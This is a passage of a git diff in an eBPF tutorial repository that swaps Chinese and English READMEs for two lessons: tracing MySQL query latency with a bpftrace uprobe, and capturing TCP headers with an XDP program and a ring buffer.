MySQL 数据库能够处理更高的负载或更复杂的查询。 +- **Identify Slow Queries**: You can quickly identify which SQL queries are taking the longest to execute. This is critical for performance tuning and optimizing your database schema or indexing strategies. +- **Monitor Database Performance**: Regularly monitor the latency of queries to ensure that your MySQL database is performing optimally under different workloads. +- **Debugging and Troubleshooting**: When facing performance issues, this tracing method can help you pinpoint the exact queries causing delays, making it easier to troubleshoot and resolve issues. +- **Capacity Planning**: By understanding the latency of various queries, you can better plan for capacity, ensuring that your MySQL database can handle increased load or more complex queries. -## 结论 +## Conclusion -eBPF 提供了一种强大的方法来监控和跟踪 MySQL 查询的性能,而无需对系统进行侵入式更改。通过使用 `bpftrace` 这样的工具,您可以实时了解数据库的性能表现,识别潜在的瓶颈,并优化系统以获得更好的性能。 +eBPF provides a powerful way to monitor and trace the performance of MySQL queries without making intrusive changes to your system. By using tools like `bpftrace`, you can gain real-time insights into how your database is performing, identify potential bottlenecks, and optimize your system for better performance. -如果您有兴趣了解更多关于 eBPF 的知识,以及如何将其用于监控和优化系统的其他部分,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或浏览我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) 获取更多示例和完整的教程。 +If you're interested in learning more about eBPF and how it can be used to monitor and optimize other parts of your system, be sure to check out our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or visit our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) for more examples and complete tutorials. 
diff --git a/src/40-mysql/README.zh.md b/src/40-mysql/README.zh.md new file mode 100644 index 0000000..7aa3486 --- /dev/null +++ b/src/40-mysql/README.zh.md @@ -0,0 +1,105 @@ +# 使用 eBPF 跟踪 MySQL 查询 + +MySQL 是全球最广泛使用的关系型数据库管理系统之一。无论您是在运行小型应用程序还是大型企业系统,了解 MySQL 数据库的性能特征都至关重要。特别是了解 SQL 查询的执行时间以及哪些查询占用了最多的时间,有助于诊断性能问题,并优化数据库以提高效率。 + +在这种情况下,eBPF(扩展的伯克利包过滤器)可以派上用场。eBPF 是一项强大的技术,它允许您编写程序并在 Linux 内核中运行,帮助您跟踪、监控和分析系统行为的各个方面,包括 MySQL 这类应用程序的性能。在本文中,我们将探讨如何使用 eBPF 跟踪 MySQL 查询,测量其执行时间,并深入了解数据库的性能表现。 + +## 背景:MySQL 和 eBPF + +### MySQL + +MySQL 是一种关系型数据库管理系统(RDBMS),使用结构化查询语言(SQL)来管理和查询数据。它广泛应用于各种场景,从 Web 应用程序到数据仓库。MySQL 的性能对应用程序的整体性能至关重要,尤其是在处理大数据集或复杂查询时。 + +### eBPF + +eBPF 是一项允许在 Linux 内核中执行自定义程序的技术,而无需修改内核源代码或加载内核模块。eBPF 最初是为网络数据包过滤而设计的,但现在已经发展为一个多用途的工具,可用于性能监控、安全和调试。eBPF 程序可以附加到各种内核和用户空间事件上,使得我们能够跟踪函数、系统调用等的执行。 + +使用 eBPF,我们可以跟踪 MySQL 的某些函数,例如负责处理 SQL 查询的 `dispatch_command` 函数。通过跟踪该函数,我们可以捕获查询执行的开始和结束时间,测量延迟,并记录执行的查询。 + +## MySQL 查询 + +要使用 eBPF 跟踪 MySQL 查询,我们可以编写一个使用 `bpftrace` 的脚本,`bpftrace` 是一种 eBPF 的高级跟踪语言。以下是一个跟踪 MySQL 中 `dispatch_command` 函数的脚本,用于记录执行的查询并测量其执行时间: + +```bt +#!/usr/bin/env bpftrace + +// 跟踪 MySQL 中的 dispatch_command 函数 +uprobe:/usr/sbin/mysqld:dispatch_command +{ + // 将命令执行的开始时间存储在 map 中 + @start_times[tid] = nsecs; + + // 打印进程 ID 和命令字符串 + printf("MySQL command executed by PID %d: ", pid); + + // dispatch_command 的第三个参数是 SQL 查询字符串 + printf("%s\n", str(arg3)); +} + +uretprobe:/usr/sbin/mysqld:dispatch_command +{ + // 从 map 中获取开始时间 + $start = @start_times[tid]; + + // 计算延迟,以毫秒为单位 + $delta = (nsecs - $start) / 1000000; + + // 打印延迟 + printf("Latency: %u ms\n", $delta); + + // 从 map 中删除条目以避免内存泄漏 + delete(@start_times[tid]); +} +``` + +### 脚本解释 + +1. **跟踪 `dispatch_command` 函数**: + - 该脚本在 MySQL 中的 `dispatch_command` 函数上附加了一个 `uprobe`。该函数在 MySQL 需要执行 SQL 查询时调用。`Uprobe` 在内核模式 eBPF 运行时中可能会导致较大的性能开销。在这种情况下,您可以考虑使用用户模式 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 + - `uprobe` 捕获函数执行的开始时间并记录正在执行的 SQL 查询。 + +2. **计算和记录延迟**: + - 一个相应的 `uretprobe` 附加到 `dispatch_command` 函数。`uretprobe` 在函数返回时触发,允许我们计算查询的总执行时间(延迟)。 + - 延迟以毫秒为单位计算并打印到控制台。 + +3. **使用 Map 管理状态**: + - 脚本使用一个 BPF map 来存储每个查询的开始时间,并以线程 ID (`tid`) 作为键。这使我们能够匹配每次查询执行的开始和结束时间。 + - 在计算延迟后,从 map 中删除条目以避免内存泄漏。 + +## 运行脚本 + +要运行此脚本,只需将其保存为文件(例如 `trace_mysql.bt`),然后使用 `bpftrace` 执行它: + +```bash +sudo bpftrace trace_mysql.bt +``` + +### 输出示例 + +脚本运行后,它将打印 MySQL 执行的每个 SQL 查询的信息,包括进程 ID、查询内容以及延迟时间: + +```console +MySQL command executed by PID 1234: SELECT * FROM users WHERE id = 1; +Latency: 15 ms +MySQL command executed by PID 1234: UPDATE users SET name = 'Alice' WHERE id = 2; +Latency: 23 ms +MySQL command executed by PID 1234: INSERT INTO orders (user_id, product_id) VALUES (1, 10); +Latency: 42 ms +``` + +这个输出显示了正在执行的 SQL 命令以及每个命令的执行时间,为您提供了关于 MySQL 查询性能的宝贵见解。 + +## 跟踪 MySQL 查询可以带来什么收获? 
+ +通过使用 eBPF 跟踪 MySQL 查询,您可以获得以下几点收获: + +- **识别慢查询**:您可以快速识别哪些 SQL 查询执行时间最长。这对于性能调优以及优化数据库模式或索引策略至关重要。 +- **监控数据库性能**:定期监控查询的延迟,确保您的 MySQL 数据库在不同工作负载下保持最佳性能。 +- **调试和故障排除**:在面对性能问题时,这种跟踪方法可以帮助您准确定位导致延迟的查询,从而更容易调试和解决问题。 +- **容量规划**:通过了解各种查询的延迟,您可以更好地进行容量规划,确保您的 MySQL 数据库能够处理更高的负载或更复杂的查询。 + +## 结论 + +eBPF 提供了一种强大的方法来监控和跟踪 MySQL 查询的性能,而无需对系统进行侵入式更改。通过使用 `bpftrace` 这样的工具,您可以实时了解数据库的性能表现,识别潜在的瓶颈,并优化系统以获得更好的性能。 + +如果您有兴趣了解更多关于 eBPF 的知识,以及如何将其用于监控和优化系统的其他部分,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或浏览我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) 获取更多示例和完整的教程。 diff --git a/src/40-mysql/README_en.md b/src/40-mysql/README_en.md deleted file mode 100644 index 6506ee5..0000000 --- a/src/40-mysql/README_en.md +++ /dev/null @@ -1,105 +0,0 @@ -# Using eBPF to Trace MySQL Queries - -MySQL is one of the most widely used relational database management systems in the world. Whether you are running a small application or a large-scale enterprise system, understanding the performance characteristics of your MySQL database can be crucial. In particular, knowing how long SQL queries take to execute and which queries are consuming the most time can help in diagnosing performance issues and optimizing your database for better efficiency. - -This is where eBPF (Extended Berkeley Packet Filter) comes into play. eBPF is a powerful technology that allows you to write programs that can run in the Linux kernel, enabling you to trace, monitor, and analyze various aspects of system behavior, including the performance of applications like MySQL. In this blog, we'll explore how to use eBPF to trace MySQL queries, measure their execution time, and gain valuable insights into your database's performance. - -## Background: MySQL and eBPF - -### MySQL - -MySQL is a relational database management system (RDBMS) that uses Structured Query Language (SQL) to manage and query data. It is widely used for a variety of applications, from web applications to data warehousing. MySQL's performance can be critical to the overall performance of your application, especially when dealing with large datasets or complex queries. - -### eBPF - -eBPF is a technology that allows for the execution of custom programs in the Linux kernel without the need to modify the kernel source code or load kernel modules. Initially designed for network packet filtering, eBPF has evolved into a versatile tool for performance monitoring, security, and debugging. eBPF programs can be attached to various kernel and user-space events, making it possible to trace the execution of functions, system calls, and more. - -Using eBPF, we can trace the execution of MySQL functions, such as `dispatch_command`, which is responsible for handling SQL queries. By tracing this function, we can capture the start and end times of query execution, measure the latency, and log the executed queries. - -## Tracing MySQL Queries with eBPF - -To trace MySQL queries using eBPF, we can write a script using `bpftrace`, a high-level tracing language for eBPF. 
Below is a script that traces the `dispatch_command` function in MySQL to log executed queries and measure their execution time: - -```bt -#!/usr/bin/env bpftrace - -// Trace the dispatch_command function in MySQL -uprobe:/usr/sbin/mysqld:dispatch_command -{ - // Store the start time of the command execution in the map - @start_times[tid] = nsecs; - - // Print the process ID and command string - printf("MySQL command executed by PID %d: ", pid); - - // The third argument to dispatch_command is the SQL query string - printf("%s\n", str(arg3)); -} - -uretprobe:/usr/sbin/mysqld:dispatch_command -{ - // Retrieve the start time from the map - $start = @start_times[tid]; - - // Calculate the latency in milliseconds - $delta = (nsecs - $start) / 1000000; - - // Print the latency - printf("Latency: %u ms\n", $delta); - - // Delete the entry from the map to avoid memory leaks - delete(@start_times[tid]); -} -``` - -### Explanation of the Script - -1. **Tracing the `dispatch_command` Function**: - - The script attaches an `uprobe` to the `dispatch_command` function in MySQL. This function is called whenever MySQL needs to execute a SQL query. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). - - The `uprobe` captures the start time of the function execution and logs the SQL query being executed. - -2. **Calculating and Logging Latency**: - - A corresponding `uretprobe` is attached to the `dispatch_command` function. The `uretprobe` triggers when the function returns, allowing us to calculate the total execution time (latency) of the query. - - The latency is calculated in milliseconds and printed to the console. - -3. **Managing State with Maps**: - - The script uses a BPF map to store the start times of each query, keyed by the thread ID (`tid`). This allows us to match the start and end of each query execution. - - After calculating the latency, the entry is removed from the map to avoid memory leaks. - -## Running the Script - -To run this script, simply save it to a file (e.g., `trace_mysql.bt`), and then execute it using `bpftrace`: - -```bash -sudo bpftrace trace_mysql.bt -``` - -### Sample Output - -Once the script is running, it will print information about each SQL query executed by MySQL, including the process ID, the query itself, and the latency: - -```console -MySQL command executed by PID 1234: SELECT * FROM users WHERE id = 1; -Latency: 15 ms -MySQL command executed by PID 1234: UPDATE users SET name = 'Alice' WHERE id = 2; -Latency: 23 ms -MySQL command executed by PID 1234: INSERT INTO orders (user_id, product_id) VALUES (1, 10); -Latency: 42 ms -``` - -This output shows the SQL commands being executed and how long each one took, providing valuable insights into the performance of your MySQL queries. - -## What Can We Learn from Tracing MySQL? - -By tracing MySQL queries with eBPF, you can gain several insights: - -- **Identify Slow Queries**: You can quickly identify which SQL queries are taking the longest to execute. This is critical for performance tuning and optimizing your database schema or indexing strategies. -- **Monitor Database Performance**: Regularly monitor the latency of queries to ensure that your MySQL database is performing optimally under different workloads. 
-- **Debugging and Troubleshooting**: When facing performance issues, this tracing method can help you pinpoint the exact queries causing delays, making it easier to troubleshoot and resolve issues. -- **Capacity Planning**: By understanding the latency of various queries, you can better plan for capacity, ensuring that your MySQL database can handle increased load or more complex queries. - -## Conclusion - -eBPF provides a powerful way to monitor and trace the performance of MySQL queries without making intrusive changes to your system. By using tools like `bpftrace`, you can gain real-time insights into how your database is performing, identify potential bottlenecks, and optimize your system for better performance. - -If you're interested in learning more about eBPF and how it can be used to monitor and optimize other parts of your system, be sure to check out our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or visit our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) for more examples and complete tutorials. diff --git a/src/41-xdp-tcpdump/README.md b/src/41-xdp-tcpdump/README.md index 3a78eae..b9a0764 100644 --- a/src/41-xdp-tcpdump/README.md +++ b/src/41-xdp-tcpdump/README.md @@ -1,22 +1,22 @@ -# eBPF 示例教程:使用 XDP 捕获 TCP 信息 +# eBPF Tutorial by Example: Capturing TCP Information with XDP -扩展伯克利包过滤器(eBPF)是 Linux 内核中的一项革命性技术,允许开发者在内核空间内运行沙箱程序。它提供了强大的网络、安全和跟踪能力,无需修改内核源代码或加载内核模块。本教程重点介绍如何使用 eBPF 结合 Express Data Path(XDP),在数据包进入时的最早阶段直接捕获 TCP 头信息。 +Extended Berkeley Packet Filter (eBPF) is a revolutionary technology in the Linux kernel that allows developers to run sandboxed programs within the kernel space. It enables powerful networking, security, and tracing capabilities without the need to modify the kernel source code or load kernel modules. This tutorial focuses on using eBPF with the Express Data Path (XDP) to capture TCP header information directly from network packets at the earliest point of ingress. -## 使用 XDP 捕获 TCP 头信息 +## Capturing TCP Headers with XDP -捕获网络数据包对于监控、调试和保护网络通信至关重要。传统工具如 `tcpdump` 在用户空间运行,可能会带来显著的开销。通过利用 eBPF 和 XDP,我们可以在内核中直接捕获 TCP 头信息,最小化开销并提高性能。 +Capturing network packets is essential for monitoring, debugging, and securing network communications. Traditional tools like `tcpdump` operate in user space and can incur significant overhead. By leveraging eBPF and XDP, we can capture TCP header information directly within the kernel, minimizing overhead and improving performance. -在本教程中,我们将开发一个 XDP 程序,该程序拦截传入的 TCP 数据包并提取其头信息。我们将这些数据存储在一个环形缓冲区中,用户空间的程序将读取并以可读的格式显示这些信息。 +In this tutorial, we'll develop an XDP program that intercepts incoming TCP packets and extracts their header information. We'll store this data in a ring buffer, which a user-space program will read and display in a human-readable format. -### 为什么使用 XDP 进行数据包捕获? +### Why Use XDP for Packet Capturing? -XDP 是 Linux 内核中一个高性能的数据路径,允许在网络栈的最低层进行可编程的数据包处理。通过将 eBPF 程序附加到 XDP,我们可以在数据包到达时立即处理它们,减少延迟并提高效率。 +XDP is a high-performance data path within the Linux kernel that allows for programmable packet processing at the lowest level of the network stack. By attaching an eBPF program to XDP, we can process packets immediately as they arrive, reducing latency and improving efficiency. -## 内核 eBPF 代码分析 +## Kernel eBPF Code Analysis -让我们深入了解捕获 TCP 头信息的内核空间 eBPF 代码。 +Let's dive into the kernel-space eBPF code that captures TCP header information. 
-### 完整的内核代码
+### Full Kernel Code

```c
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#define ETH_P_IP 0x0800

-// 定义环形缓冲区映射
+// Define the ring buffer map
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
-    __uint(max_entries, 1 << 24); // 16 MB 缓冲区
+    __uint(max_entries, 1 << 24); // 16 MB buffer
} rb SEC(".maps");

-// 检查数据包是否为 TCP 的辅助函数
+// Helper function to check if the packet is TCP
static bool is_tcp(struct ethhdr *eth, void *data_end)
{
-    // 确保以太网头在边界内
+    // Ensure Ethernet header is within bounds
    if ((void *)(eth + 1) > data_end)
        return false;

-    // 仅处理 IPv4 数据包
+    // Only handle IPv4 packets
    if (bpf_ntohs(eth->h_proto) != ETH_P_IP)
        return false;

    struct iphdr *ip = (struct iphdr *)(eth + 1);

-    // 确保 IP 头在边界内
+    // Ensure IP header is within bounds
    if ((void *)(ip + 1) > data_end)
        return false;

-    // 检查协议是否为 TCP
+    // Check if the protocol is TCP
    if (ip->protocol != IPPROTO_TCP)
        return false;

    return true;
}

SEC("xdp")
int xdp_pass(struct xdp_md *ctx)
{
-    // 数据包数据指针
+    // Pointers to packet data
    void *data = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

-    // 解析以太网头
+    // Parse Ethernet header
    struct ethhdr *eth = data;

-    // 检查数据包是否为 TCP 数据包
+    // Check if the packet is a TCP packet
    if (!is_tcp(eth, data_end)) {
        return XDP_PASS;
    }

-    // 转换为 IP 头
+    // Cast to IP header
    struct iphdr *ip = (struct iphdr *)(eth + 1);

-    // 计算 IP 头长度
+    // Calculate IP header length
    int ip_hdr_len = ip->ihl * 4;
    if (ip_hdr_len < sizeof(struct iphdr)) {
        return XDP_PASS;
    }

-    // 确保 IP 头在数据包边界内
+    // Ensure IP header is within packet bounds
    if ((void *)ip + ip_hdr_len > data_end) {
        return XDP_PASS;
    }

-    // 解析 TCP 头
+    // Parse TCP header
    struct tcphdr *tcp = (struct tcphdr *)((unsigned char *)ip + ip_hdr_len);

-    // 确保 TCP 头在数据包边界内
+    // Ensure TCP header is within packet bounds
    if ((void *)(tcp + 1) > data_end) {
        return XDP_PASS;
    }

-    // 定义要捕获的 TCP 头字节数
+    // Define the number of bytes you want to capture from the TCP header
    const int tcp_header_bytes = 32;

-    // 确保所需字节数不超过数据包边界
+    // Ensure that the desired number of bytes does not exceed packet bounds
    if ((void *)tcp + tcp_header_bytes > data_end) {
        return XDP_PASS;
    }

-    // 在环形缓冲区中预留空间
+    // Reserve space in the ring buffer
    void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0);
    if (!ringbuf_space) {
-        return XDP_PASS; // 如果预留失败,跳过处理
+        return XDP_PASS; // If reservation fails, skip processing
    }

-    // 将 TCP 头字节复制到环形缓冲区
-    // 使用循环以确保符合 eBPF 验证器要求
+    // Copy the TCP header bytes into the ring buffer
+    // Using a loop to ensure compliance with the eBPF verifier
    for (int i = 0; i < tcp_header_bytes; i++) {
        unsigned char byte = *((unsigned char *)tcp + i);
        ((unsigned char *)ringbuf_space)[i] = byte;
    }

-    // 将数据提交到环形缓冲区
+    // Submit the data to the ring buffer
    bpf_ringbuf_submit(ringbuf_space, 0);

-    // 可选:打印调试信息
+    // Optional: Print a debug message
    bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes);

    return XDP_PASS;
}

char __license[] SEC("license") = "GPL";
```

-### 代码解释
+### Code Explanation

-#### 定义环形缓冲区映射
+#### Defining the Ring Buffer Map

-我们定义了一个名为 `rb` 的环形缓冲区映射,用于高效地将数据从内核传递到用户空间。
+We define a ring buffer map named `rb` to pass data from the kernel to user space efficiently.
```c struct { __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 1 << 24); // 16 MB 缓冲区 + __uint(max_entries, 1 << 24); // 16 MB buffer } rb SEC(".maps"); ``` -#### 数据包解析与验证 +#### Packet Parsing and Validation -`is_tcp` 辅助函数通过验证以太网和 IP 头,检查传入的数据包是否为 TCP 数据包。 +The `is_tcp` helper function checks whether the incoming packet is a TCP packet by verifying the Ethernet and IP headers. ```c static bool is_tcp(struct ethhdr *eth, void *data_end) { - // ...(检查内容略) + // ... (checks omitted for brevity) } ``` -#### 捕获 TCP 头信息 +#### Capturing TCP Header Information -在 `xdp_pass` 函数中,我们: +In the `xdp_pass` function, we: -1. 解析以太网、IP 和 TCP 头。 -2. 确保所有头信息在数据包边界内,以防止无效内存访问。 -3. 在环形缓冲区中预留空间以存储 TCP 头。 -4. 将 TCP 头字节复制到环形缓冲区。 -5. 提交数据到环形缓冲区,供用户空间使用。 +1. Parse the Ethernet, IP, and TCP headers. +2. Ensure all headers are within the packet bounds to prevent invalid memory access. +3. Reserve space in the ring buffer to store the TCP header. +4. Copy the TCP header bytes into the ring buffer. +5. Submit the data to the ring buffer for user-space consumption. ```c -// 在环形缓冲区中预留空间 +// Reserve space in the ring buffer void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); if (!ringbuf_space) { return XDP_PASS; } -// 复制 TCP 头字节 +// Copy the TCP header bytes for (int i = 0; i < tcp_header_bytes; i++) { unsigned char byte = *((unsigned char *)tcp + i); ((unsigned char *)ringbuf_space)[i] = byte; } -// 提交到环形缓冲区 +// Submit to ring buffer bpf_ringbuf_submit(ringbuf_space, 0); ``` -#### 使用 bpf_printk 进行调试 +#### Using bpf_printk for Debugging -`bpf_printk` 函数将消息记录到内核的跟踪管道,对于调试非常有用。 +The `bpf_printk` function logs messages to the kernel's trace pipe, which can be invaluable for debugging. ```c bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); ``` -## 用户空间代码分析 +## User-Space Code Analysis -让我们查看用户空间程序,该程序从环形缓冲区中读取捕获的 TCP 头信息并显示。 +Let's examine the user-space program that reads the captured TCP headers from the ring buffer and displays them. -### 完整的用户空间代码 +### Full User-Space Code ```c #include @@ -201,17 +201,17 @@ bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); #include #include -#include "xdp-tcpdump.skel.h" // 生成的骨架头文件 +#include "xdp-tcpdump.skel.h" // Generated skeleton header -// 处理环形缓冲区事件的回调函数 +// Callback function to handle events from the ring buffer static int handle_event(void *ctx, void *data, size_t data_sz) { - if (data_sz < 20) { // 最小 TCP 头大小 + if (data_sz < 20) { // Minimum TCP header size fprintf(stderr, "Received incomplete TCP header\n"); return 0; } - // 解析原始 TCP 头字节 + // Parse the raw TCP header bytes struct tcphdr { uint16_t source; uint16_t dest; @@ -230,7 +230,7 @@ static int handle_event(void *ctx, void *data, size_t data_sz) uint16_t window; uint16_t check; uint16_t urg_ptr; - // 可能还有选项和填充 + // Options and padding may follow } __attribute__((packed)); if (data_sz < sizeof(struct tcphdr)) { @@ -240,14 +240,14 @@ static int handle_event(void *ctx, void *data, size_t data_sz) struct tcphdr *tcp = (struct tcphdr *)data; - // 将字段从网络字节序转换为主机字节序 + // Convert fields from network byte order to host byte order uint16_t source_port = ntohs(tcp->source); uint16_t dest_port = ntohs(tcp->dest); uint32_t seq = ntohl(tcp->seq); uint32_t ack_seq = ntohl(tcp->ack_seq); uint16_t window = ntohs(tcp->window); - // 提取标志位 + // Extract flags uint8_t flags = 0; flags |= (tcp->fin) ? 0x01 : 0x00; flags |= (tcp->syn) ? 0x02 : 0x00; @@ -259,13 +259,13 @@ static int handle_event(void *ctx, void *data, size_t data_sz) flags |= (tcp->cwr) ? 
0x80 : 0x00; printf("Captured TCP Header:\n"); - printf(" 源端口: %u\n", source_port); - printf(" 目的端口: %u\n", dest_port); - printf(" 序列号: %u\n", seq); - printf(" 确认号: %u\n", ack_seq); - printf(" 数据偏移: %u\n", tcp->doff); - printf(" 标志位: 0x%02x\n", flags); - printf(" 窗口大小: %u\n", window); + printf(" Source Port: %u\n", source_port); + printf(" Destination Port: %u\n", dest_port); + printf(" Sequence Number: %u\n", seq); + printf(" Acknowledgment Number: %u\n", ack_seq); + printf(" Data Offset: %u\n", tcp->doff); + printf(" Flags: 0x%02x\n", flags); + printf(" Window Size: %u\n", window); printf("\n"); return 0; @@ -292,7 +292,7 @@ int main(int argc, char **argv) return 1; } - /* 打开并加载 BPF 应用 */ + /* Open and load BPF application */ skel = xdp_tcpdump_bpf__open(); if (!skel) { @@ -300,7 +300,7 @@ int main(int argc, char **argv) return 1; } - /* 加载并验证 BPF 程序 */ + /* Load & verify BPF programs */ err = xdp_tcpdump_bpf__load(skel); if (err) { @@ -308,7 +308,7 @@ int main(int argc, char **argv) goto cleanup; } - /* 附加 XDP 程序 */ + /* Attach XDP program */ err = xdp_tcpdump_bpf__attach(skel); if (err) { @@ -316,7 +316,7 @@ int main(int argc, char **argv) goto cleanup; } - /* 将 XDP 程序附加到指定的接口 */ + /* Attach the XDP program to the specified interface */ skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); if (!skel->links.xdp_pass) { @@ -325,9 +325,9 @@ int main(int argc, char **argv) goto cleanup; } - printf("成功将 XDP 程序附加到接口 %s\n", ifname); + printf("Successfully attached XDP program to interface %s\n", ifname); - /* 设置环形缓冲区轮询 */ + /* Set up ring buffer polling */ rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); if (!rb) { @@ -336,9 +336,9 @@ int main(int argc, char **argv) goto cleanup; } - printf("开始轮询环形缓冲区\n"); + printf("Start polling ring buffer\n"); - /* 轮询环形缓冲区 */ + /* Poll the ring buffer */ while (1) { err = ring_buffer__poll(rb, -1); @@ -358,29 +358,29 @@ cleanup: } ``` -### 代码解释 +### Code Explanation -#### 处理环形缓冲区事件 +#### Handling Ring Buffer Events -`handle_event` 函数处理从环形缓冲区接收到的 TCP 头数据。 +The `handle_event` function processes TCP header data received from the ring buffer. ```c static int handle_event(void *ctx, void *data, size_t data_sz) { - // 验证数据大小 + // Validate data size if (data_sz < 20) { fprintf(stderr, "Received incomplete TCP header\n"); return 0; } - // 解析 TCP 头 - // ...(解析代码) + // Parse the TCP header + // ... (parsing code) } ``` -#### 解析 TCP 头 +#### Parsing the TCP Header -我们定义了一个本地的 `tcphdr` 结构来解释原始字节。 +We define a local `tcphdr` structure to interpret the raw bytes. ```c struct tcphdr { @@ -388,34 +388,34 @@ struct tcphdr { uint16_t dest; uint32_t seq; uint32_t ack_seq; - // ...(其他字段) + // ... (other fields) } __attribute__((packed)); ``` -#### 显示捕获的信息 +#### Displaying Captured Information -解析后,我们以可读的格式打印 TCP 头字段。 +After parsing, we print the TCP header fields in a readable format. ```c printf("Captured TCP Header:\n"); -printf(" 源端口: %u\n", source_port); -printf(" 目的端口: %u\n", dest_port); -// ...(其他字段) +printf(" Source Port: %u\n", source_port); +printf(" Destination Port: %u\n", dest_port); +// ... (other fields) ``` -#### 设置 eBPF 骨架 +#### Setting Up the eBPF Skeleton -我们使用生成的骨架 `xdp-tcpdump.skel.h` 来加载和附加 eBPF 程序。 +We use the generated skeleton `xdp-tcpdump.skel.h` to load and attach the eBPF program. 
```c -/* 打开并加载 BPF 应用 */ +/* Open and load BPF application */ skel = xdp_tcpdump_bpf__open(); if (!skel) { fprintf(stderr, "Failed to open BPF skeleton\n"); return 1; } -/* 加载并验证 BPF 程序 */ +/* Load & verify BPF programs */ err = xdp_tcpdump_bpf__load(skel); if (err) { fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); @@ -423,12 +423,11 @@ if (err) { } ``` -#### 附加到网络接口 +#### Attaching to the Network Interface -我们通过接口名称将 XDP 程序附加到指定的网络接口。 +We attach the XDP program to the specified network interface by name. ```c -/* 将 XDP 程序附加到指定的接口 */ skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); if (!skel->links.xdp_pass) { err = -errno; @@ -437,34 +436,34 @@ if (!skel->links.xdp_pass) { } ``` -## 编译和执行说明 +## Compilation and Execution Instructions -### 前提条件 +### Prerequisites -- 支持 eBPF 和 XDP 的 Linux 系统内核。 -- 安装了 libbpf 库。 -- 具有 eBPF 支持的编译器(如 clang)。 +- A Linux system with a kernel version that supports eBPF and XDP. +- libbpf library installed. +- Compiler with eBPF support (clang). -### 构建程序 +### Building the Program -假设您已从 [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial) 克隆了仓库,请导航到 `bpf-developer-tutorial/src/41-xdp-tcpdump` 目录。 +Assuming you have cloned the repository from [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial), navigate to the `bpf-developer-tutorial/src/41-xdp-tcpdump` directory. ```bash cd bpf-developer-tutorial/src/41-xdp-tcpdump make ``` -此命令将编译内核 eBPF 代码和用户空间应用程序。 +This command compiles both the kernel eBPF code and the user-space application. -### 运行程序 +### Running the Program -首先,识别您的网络接口: +First, identify your network interfaces: ```bash ifconfig ``` -示例输出: +Sample output: ``` wlp0s20f3: flags=4163 mtu 1500 @@ -472,38 +471,38 @@ wlp0s20f3: flags=4163 mtu 1500 ether 00:1a:2b:3c:4d:5e txqueuelen 1000 (Ethernet) ``` -使用所需的网络接口运行用户空间程序: +Run the user-space program with the desired network interface: ```bash sudo ./xdp-tcpdump wlp0s20f3 ``` -示例输出: +Sample output: ``` -成功将 XDP 程序附加到接口 wlp0s20f3 -开始轮询环形缓冲区 +Successfully attached XDP program to interface wlp0s20f3 +Start polling ring buffer Captured TCP Header: - 源端口: 443 - 目的端口: 53500 - 序列号: 572012449 - 确认号: 380198588 - 数据偏移: 8 - 标志位: 0x10 - 窗口大小: 16380 + Source Port: 443 + Destination Port: 53500 + Sequence Number: 572012449 + Acknowledgment Number: 380198588 + Data Offset: 8 + Flags: 0x10 + Window Size: 16380 ``` -### 完整的源代码和资源 +### Complete Source Code and Resources -- **源代码仓库:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) -- **教程网站:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) +- **Source Code Repository:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) +- **Tutorial Website:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) -## 总结与结论 +## Summary and Conclusion -在本教程中,我们探讨了如何使用 eBPF 和 XDP 在 Linux 内核中直接捕获 TCP 头信息。通过分析内核 eBPF 代码和用户空间应用程序,我们学习了如何拦截数据包、提取关键的 TCP 字段,并使用环形缓冲区高效地将这些数据传递到用户空间。 +In this tutorial, we explored how to use eBPF and XDP to capture TCP header information directly within the Linux kernel. By analyzing both the kernel eBPF code and the user-space application, we learned how to intercept packets, extract essential TCP fields, and communicate this data to user space efficiently using a ring buffer. -这种方法为传统的数据包捕获方法提供了一种高性能的替代方案,对系统资源的影响最小。它是网络监控、安全分析和调试的强大技术。 +This approach offers a high-performance alternative to traditional packet capturing methods, with minimal impact on system resources. 
